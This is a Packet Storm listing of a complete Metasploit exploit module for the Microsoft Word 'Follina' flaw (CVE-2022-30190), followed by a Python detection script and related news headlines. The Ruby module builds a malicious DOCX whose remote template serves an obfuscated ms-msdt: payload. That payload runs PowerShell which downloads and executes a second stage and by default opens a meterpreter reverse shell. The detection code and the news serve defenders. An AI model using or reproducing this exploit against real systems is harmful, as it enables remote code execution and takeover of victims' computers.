Microsoft Office Word MSDTJS Code Execution

This Metasploit module generates a malicious Microsoft Word document that when loaded, will leverage the remote template feature to fetch an HTML document and then use the ms-msdt scheme to execute PowerShell code.

Packet Storm
```ruby
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::FILEFORMAT
  include Msf::Exploit::Powershell
  include Msf::Exploit::Remote::HttpServer::HTML

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Microsoft Office Word MSDTJS',
        'Description' => %q{
          This module generates a malicious Microsoft Word document that when loaded, will leverage the remote template
          feature to fetch an `HTML` document and then use the `ms-msdt` scheme to execute `PowerShell` code.
        },
        'References' => [
          ['CVE', '2022-30190'],
          ['URL', 'https://www.reddit.com/r/blueteamsec/comments/v06w2o/suspected_microsoft_word_zero_day_in_the_wild/'],
          ['URL', 'https://twitter.com/nao_sec/status/1530196847679401984?t=3Pjrpdog_H6OfMHVLMR5eQ&s=19'],
          ['URL', 'https://app.any.run/tasks/713f05d2-fe78-4b9d-a744-f7c133e3fafb/'],
          ['URL', 'https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e'],
          ['URL', 'https://twitter.com/GossiTheDog/status/1531608245009367040'],
          ['URL', 'https://github.com/JMousqueton/PoC-CVE-2022-30190']
        ],
        'Author' => [
          'nao sec', # Original disclosure.
          'mekhalleh (RAMELLA Sébastien)' # Zeop CyberSecurity
        ],
        'DisclosureDate' => '2022-05-29',
        'License' => MSF_LICENSE,
        'Privileged' => false,
        'Platform' => 'win',
        'Arch' => [ARCH_X86, ARCH_X64],
        'Payload' => {
          'DisableNops' => true
        },
        'DefaultOptions' => {
          'DisablePayloadHandler' => false,
          'FILENAME' => 'msf.docx',
          'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp',
          'SRVHOST' => Rex::Socket.source_address('1.2.3.4')
        },
        'Targets' => [
          [ 'Microsoft Office Word', {} ]
        ],
        'DefaultTarget' => 0,
        'Notes' => {
          'AKA' => ['Follina'],
          'Stability' => [CRASH_SAFE],
          'Reliability' => [UNRELIABLE_SESSION],
          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
        }
      )
    )

    register_options([
      OptPath.new('CUSTOMTEMPLATE', [false, 'A DOCX file that will be used as a template to build the exploit.']),
      OptBool.new('OBFUSCATE', [true, 'Obfuscate JavaScript content.', true])
    ])
  end

  # Look up a part of the unpacked DOCX by its archive path.
  def get_file_in_docx(fname)
    i = @docx.find_index { |item| item[:fname] == fname }
    unless i
      fail_with(Failure::NotFound, "This template cannot be used because it is missing: #{fname}")
    end

    @docx.fetch(i)[:data]
  end

  def get_template_path
    datastore['CUSTOMTEMPLATE'] || File.join(Msf::Config.data_directory, 'exploits', 'word_msdtjs.docx')
  end

  # Build the HTML page served as the remote template; its script navigates to an ms-msdt: URL.
  def generate_html
    uri = "#{@proto}://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}#{normalize_uri(@my_resources.first.to_s)}.ps1"

    # Padding comment lines (the HTML must be large enough for the scheme handler to fire).
    dummy = ''
    (1..random_int(61, 100)).each do |_n|
      dummy += '//' + rand_text_alpha(100) + "\n"
    end

    cmd = Rex::Text.encode_base64("IEX(New-Object Net.WebClient).downloadString('#{uri}')")
    js_content = "window.location.href = \"ms-msdt:/id PCWDiagnostic /skip force /param \\\"IT_RebrowseForFile=cal?c IT_LaunchMethod=ContextMenu IT_SelectProgram=NotListed IT_BrowseForFile=h$(Invoke-Expression($(Invoke-Expression('[System.Text.Encoding]'+[char]58+[char]58+'UTF8.GetString([System.Convert]'+[char]58+[char]58+'FromBase64String('+[char]34+'#{cmd}'+[char]34+'))'))))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe IT_AutoTroubleshoot=ts_AUTO\\\"\";"

    if datastore['OBFUSCATE']
      print_status('Obfuscate JavaScript content')
      js_content = Rex::Exploitation::JSObfu.new js_content
      js_content = js_content.obfuscate(memory_sensitive: false)
    end

    html = '<!DOCTYPE html><html><head><meta http-equiv="Expires" content="-1"><meta http-equiv="X-UA-Compatible" content="IE=11"></head><body><script>'
    html += "\n#{dummy}\n#{js_content}\n"
    html += '</script></body></html>'

    html
  end

  # Point the document's relationship placeholder (TARGET_HERE) at the HTTP server's .html resource.
  def inject_docx
    document_xml = get_file_in_docx('word/document.xml')
    unless document_xml
      fail_with(Failure::NotFound, 'This template cannot be used because it is missing: word/document.xml')
    end

    document_xml_rels = get_file_in_docx('word/_rels/document.xml.rels')
    unless document_xml_rels
      fail_with(Failure::NotFound, 'This template cannot be used because it is missing: word/_rels/document.xml.rels')
    end

    uri = "#{@proto}://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}#{normalize_uri(@my_resources.first.to_s)}.html"

    @docx.each do |entry|
      case entry[:fname]
      when 'word/_rels/document.xml.rels'
        entry[:data] = document_xml_rels.to_s.gsub!('TARGET_HERE', "#{uri}&#x21;")
      end
    end
  end

  def normalize_uri(*strs)
    new_str = strs * '/'

    new_str = new_str.gsub!('//', '/') while new_str.index('//')

    # makes sure there's a starting slash
    unless new_str.start_with?('/')
      new_str = '/' + new_str
    end

    new_str
  end

  # Serve the HTML stage on *.html and the PowerShell stage on *.ps1.
  def on_request_uri(cli, request)
    header_html = {
      'Access-Control-Allow-Origin' => '*',
      'Access-Control-Allow-Methods' => 'GET, POST',
      'Cache-Control' => 'no-store, no-cache, must-revalidate',
      'Content-Type' => 'text/html; charset=UTF-8'
    }

    if request.method.eql? 'HEAD'
      send_response(cli, '', header_html)
    elsif request.method.eql? 'OPTIONS'
      response = create_response(501, 'Unsupported Method')
      response['Content-Type'] = 'text/html'
      response.body = ''
      cli.send_response(response)
    elsif request.raw_uri.to_s.end_with? '.html'
      print_status('Sending HTML Payload')
      send_response_html(cli, generate_html, header_html)
    elsif request.raw_uri.to_s.end_with? '.ps1'
      print_status('Sending PowerShell Payload')
      send_response(cli, @payload_data, header_html)
    end
  end

  # Serialize any parsed XML parts back to strings and zip the parts into a DOCX.
  def pack_docx
    @docx.each do |entry|
      if entry[:data].is_a?(Nokogiri::XML::Document)
        entry[:data] = entry[:data].to_s
      end
    end

    Msf::Util::EXE.to_zip(@docx)
  end

  def primer
    print_status('Generating a malicious docx file')

    @proto = (datastore['SSL'] ? 'https' : 'http')

    template_path = get_template_path
    unless File.extname(template_path).downcase.end_with?('.docx')
      fail_with(Failure::BadConfig, 'Template is not a docx file!')
    end

    print_status("Using template '#{template_path}'")
    @docx = unpack_docx(template_path)

    print_status('Injecting payload in docx document')
    inject_docx

    print_status("Finalizing docx '#{datastore['FILENAME']}'")
    file_create(pack_docx)

    @payload_data = cmd_psh_payload(payload.encoded, payload_instance.arch.first, remove_comspec: true, exec_in_place: true)

    super
  end

  def random_int(min, max)
    rand(max - min) + min
  end

  # Read every entry of the template DOCX; XML and .rels parts are parsed with Nokogiri.
  def unpack_docx(template_path)
    document = []

    Zip::File.open(template_path) do |entries|
      entries.each do |entry|
        if entry.name.downcase.end_with?('.xml', '.rels')
          content = Nokogiri::XML(entry.get_input_stream.read) if entry.file?
        elsif entry.file?
          content = entry.get_input_stream.read
        end

        vprint_status("Parsing item from template: #{entry.name}")
        document << { fname: entry.name, data: content }
      end
    end

    document
  end
end
```
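The module's two observable stages are a DOCX whose relationship part carries an External relationship to an HTTP(S) URL (ending in `!`, the `&#x21;` the module appends to `TARGET_HERE`) and an HTML page whose script sets `window.location.href` to an `ms-msdt:` URL behind a run of `//` padding comments. The following is an added detection example written for this page; it is not part of the Metasploit module or the Packet Storm listing. It inspects a DOCX for external relationship targets and a fetched HTML body for the `ms-msdt:` markers, using only the Python standard library. The sample document and HTML are constructed inline as test data (the hostname `template.example.invalid` is a placeholder), and the OOXML relationship-type URIs are the standard ones.

```python
import io
import re
import zipfile
import xml.etree.ElementTree as ET
from urllib.parse import urlparse

# Standard OOXML namespaces (not from the page; these are the published schema URIs).
REL_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
ATTACHED_TEMPLATE = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/attachedTemplate"

# Markers taken from the module's generate_html: the ms-msdt scheme and the parameters it passes.
MSDT_SCHEME = re.compile(r"ms-msdt:", re.IGNORECASE)
MSDT_PARAMS = ("PCWDiagnostic", "IT_BrowseForFile", "IT_RebrowseForFile", "Invoke-Expression")
# The module pads the script with 61-100 lines of '//' followed by 100 alphabetic characters.
PADDING_LINE = re.compile(r"^//[A-Za-z]{100}$", re.MULTILINE)


def scan_docx_relationships(docx_bytes: bytes) -> list:
    """Return every External relationship, in any .rels part, whose Target is an http(s) URL.

    Word resolves such targets when the document opens, which is the remote-template
    behaviour the module relies on. A trailing '!' matches the module's injection.
    """
    findings = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as zf:
        for name in zf.namelist():
            if not name.lower().endswith(".rels"):
                continue
            root = ET.fromstring(zf.read(name))
            for rel in root.iter(f"{{{REL_NS}}}Relationship"):
                if rel.get("TargetMode", "Internal") != "External":
                    continue
                target = rel.get("Target", "")
                if urlparse(target).scheme.lower() not in ("http", "https"):
                    continue
                findings.append({
                    "part": name,
                    "id": rel.get("Id"),
                    "type": rel.get("Type", "").rsplit("/", 1)[-1],
                    "target": target,
                    "trailing_bang": target.endswith("!"),
                })
    return findings


def scan_html_for_msdt(html: str) -> dict:
    """Flag the ms-msdt scheme, its diagnostic parameters, and the module's comment padding."""
    return {
        "ms_msdt_scheme": bool(MSDT_SCHEME.search(html)),
        "params": [p for p in MSDT_PARAMS if p in html],
        "padding_comment_lines": len(PADDING_LINE.findall(html)),
    }


def build_sample_docx(template_url: str) -> bytes:
    """Constructed test data: a minimal, non-functional DOCX whose document.xml.rels has one
    External relationship, written the way the module writes it (URL followed by &#x21;)."""
    rels = (
        '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
        f'<Relationships xmlns="{REL_NS}">'
        f'<Relationship Id="rId1" Type="{ATTACHED_TEMPLATE}" Target="{template_url}&#x21;" TargetMode="External"/>'
        '<Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles" Target="styles.xml"/>'
        "</Relationships>"
    )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("[Content_Types].xml", '<?xml version="1.0"?><Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types"/>')
        zf.writestr("word/document.xml", '<?xml version="1.0"?><w:document xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main"/>')
        zf.writestr("word/_rels/document.xml.rels", rels)
    return buf.getvalue()


# Constructed HTML sample shaped like the module's output (three padding lines, truncated parameters).
SAMPLE_HTML = (
    "<html><body><script>\n"
    + "".join("//" + "a" * 100 + "\n" for _ in range(3))
    + 'window.location.href = "ms-msdt:/id PCWDiagnostic /skip force '
    + '/param \\"IT_BrowseForFile=h$(Invoke-Expression(...))i\\"";\n'
    + "</script></body></html>"
)


if __name__ == "__main__":
    sample = build_sample_docx("http://template.example.invalid/tpl.html")
    for f in scan_docx_relationships(sample):
        print(f"{f['part']}: {f['type']} -> {f['target']} (trailing '!': {f['trailing_bang']})")
    print(scan_html_for_msdt(SAMPLE_HTML))
```

The relationship scan is the higher-value check: it works on the document at rest, before any template is fetched, and is unaffected by the module's `OBFUSCATE` option. The HTML check is a first-pass string match only; with `OBFUSCATE` enabled the `ms-msdt:` literal is hidden by JSObfu, so the padding-line count and the external relationship are the more durable indicators.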

Related news

Russia's 'Fighting Ursa' APT Uses Car Ads to Install HeadLace Malware

The scheme, from the group also known as APT28, involves targeting Eastern European diplomats in need of personal transportation and tempting them with a purported good deal on an Audi Q7 Quattro SUV.

Major Cybersecurity Agencies Collaborate to Unveil 2022's Most Exploited Vulnerabilities

A four-year-old critical security flaw impacting Fortinet FortiOS SSL has emerged as one of the most routinely and frequently exploited vulnerabilities in 2022. "In 2022, malicious cyber actors exploited older software vulnerabilities more frequently than recently disclosed vulnerabilities and targeted unpatched, internet-facing systems," cybersecurity and intelligence agencies from the Five

XWorm Malware Exploits Follina Vulnerability in New Wave of Attacks

Cybersecurity researchers have discovered an ongoing phishing campaign that makes use of a unique attack chain to deliver the XWorm malware on targeted systems. Securonix, which is tracking the activity cluster under the name MEME#4CHAN, said some of the attacks have primarily targeted manufacturing firms and healthcare clinics located in Germany. "The attack campaign has been leveraging rather

Chinese Espionage Hackers Target Tibetans Using New LOWZERO Backdoor

A China-aligned advanced persistent threat actor known as TA413 weaponized recently disclosed flaws in Sophos Firewall and Microsoft Office to deploy a never-before-seen backdoor called LOWZERO as part of an espionage campaign aimed at Tibetan entities. Targets primarily consisted of organizations associated with the Tibetan community, including enterprises associated with the Tibetan

Some Members of Conti Group Targeting Ukraine in Financially Motivated Attacks

Former members of the Conti cybercrime cartel have been implicated in five different campaigns targeting Ukraine from April to August 2022. The findings, which come from Google's Threat Analysis Group (TAG), build upon a prior report published in July 2022, detailing the continued cyber activity aimed at the Eastern European nation amid the ongoing Russo-Ukrainian war. "UAC-0098 is a threat

Microsoft Issues Patches for 121 Flaws, Including Zero-Day Under Active Attack

As many as 121 new security flaws were patched by Microsoft as part of its Patch Tuesday updates for the month of August, which also includes a fix for a Support Diagnostic Tool vulnerability that the company said is being actively exploited in the wild. Of the 121 bugs, 17 are rated Critical, 102 are rated Important, one is rated Moderate, and one is rated Low in severity. Two of the issues

Woody RAT: A new feature-rich malware spotted in the wild

The Malwarebytes Threat Intelligence team has discovered a new Remote Access Trojan that we dubbed Woody Rat used to target Russian entities.

Empower Your Security Operations Team to Combat Emerging Threats

When examining the modern threat landscape, empowering your security operations and overcoming the limitations inherent with other malware prevention solutions is imperative.

You Need to Update Windows and Chrome Right Now

Plus: Google issues fixes for Android bugs, and Cisco, Citrix, SAP, WordPress, and more issue major patches for enterprise systems.

Russia's APT28 Launches Nuke-Themed Follina Exploit Campaign

Researchers have spotted the threat group, also known as Fancy Bear and Sofacy, using the Windows MSDT vulnerability to distribute information stealers to users in Ukraine.

Russian Hackers Exploiting Microsoft Follina Vulnerability Against Ukraine

The Computer Emergency Response Team of Ukraine (CERT-UA) has cautioned of a new set of spear-phishing attacks exploiting the "Follina" flaw in the Windows operating system to deploy password-stealing malware. Attributing the intrusions to a Russian nation-state group tracked as APT28 (aka Fancy Bear or Sofacy), the agency said the attacks commence with a lure document titled "Nuclear Terrorism

Update now! Microsoft patches Follina, and many other security updates

Patch Tuesday for June 2022 brought a fix for Follina and many other security vulnerabilities. Time to figure out what needs to be prioritized.

Microsoft Patch Tuesday, June 2022 Edition

Microsoft on Tuesday released software updates to fix 60 security vulnerabilities in its Windows operating systems and other software, including a zero-day flaw in all supported Microsoft Office versions on all flavors of Windows that's seen active exploitation for at least two months now. On a lighter note, Microsoft is officially retiring its Internet Explorer (IE) web browser, which turns 27 years old this year.

Patch Tuesday: Microsoft Issues Fix for Actively Exploited 'Follina' Vulnerability

Microsoft officially released fixes to address an actively exploited Windows zero-day vulnerability known as Follina as part of its Patch Tuesday updates. Also addressed by the tech giant are 55 other flaws, three of which are rated Critical, 51 are rated Important, and one is rated Moderate in severity. Separately, five other shortcomings were resolved in the Microsoft Edge browser.

Follina Exploited by State-Sponsored Hackers

A government-aligned attacker tried using a Microsoft vulnerability to attack U.S. and E.U. government targets.

Threat Source newsletter (June 2, 2022) — An RSA Conference primer

By Jon Munshaw. Welcome to this week's edition of the Threat Source newsletter. Many of you readers may be gearing up for a West Coast swing over the next few weeks through San Francisco and Las Vegas for RSA and Cisco Live, respectively. And we're right behind you! Talos...

Fighting Follina: Application Vulnerabilities and Detection Possibilities

Although organizations should perform proper risk analysis and patch as soon as practical after there's a fix for this vulnerability, defenders still have options before that's released.

FAQ: Mitigating Microsoft Office’s ‘Follina’ zero-day

FAQ for the new Follina zero-day vulnerability. What you can do to protect your computers right now.

Unofficial Micropatch for Follina Released as Chinese Hackers Exploit the 0-day

By Waqas. The Follina vulnerability was originally discovered after a malicious Microsoft Word document was uploaded on VirusTotal from a…

Threat Advisory: Zero-day vulnerability in Microsoft diagnostic tool MSDT could lead to code execution

A recently discovered zero-day vulnerability in the Microsoft Windows Support Diagnostic Tool (MSDT) made headlines over the past few days. CVE-2022-30190, also known under the name "Follina," exists when MSDT is called using the URL protocol from an application, such as Microsoft Office, Microsoft...

Microsoft Releases Workaround for ‘One-Click’ 0Day Under Active Attack

Threat actors already are exploiting vulnerability, dubbed ‘Follina’ and originally identified back in April, to target organizations in Russia and Tibet, researchers said.

Chinese Hackers Begin Exploiting Latest Microsoft Office Zero-Day Vulnerability

An advanced persistent threat (APT) actor aligned with Chinese state interests has been observed weaponizing the new zero-day flaw in Microsoft Office to achieve code execution on affected systems. "TA413 CN APT spotted [in-the-wild] exploiting the Follina zero-day using URLs to deliver ZIP archives which contain Word Documents that use the technique," enterprise security firm Proofpoint said in

New Microsoft Zero-Day Attack Underway

"Follina" vulnerability in Microsoft Support Diagnostic Tool (MSDT) affects all currently supported Windows versions and can be triggered via specially crafted Office documents.

Microsoft Office MSDT Follina Proof Of Concept

Proof of concept for the remote code execution vulnerability in MSDT known as Follina.

Microsoft Releases Workarounds for Office Vulnerability Under Active Exploitation

Microsoft on Monday published guidance for a newly discovered zero-day security flaw in its Office productivity suite that could be exploited to achieve code execution on affected systems. The weakness, now assigned the identifier CVE-2022-30190, is rated 7.8 out of 10 for severity on the CVSS vulnerability scoring system. Microsoft Office versions Office 2013, Office 2016, Office 2019, and
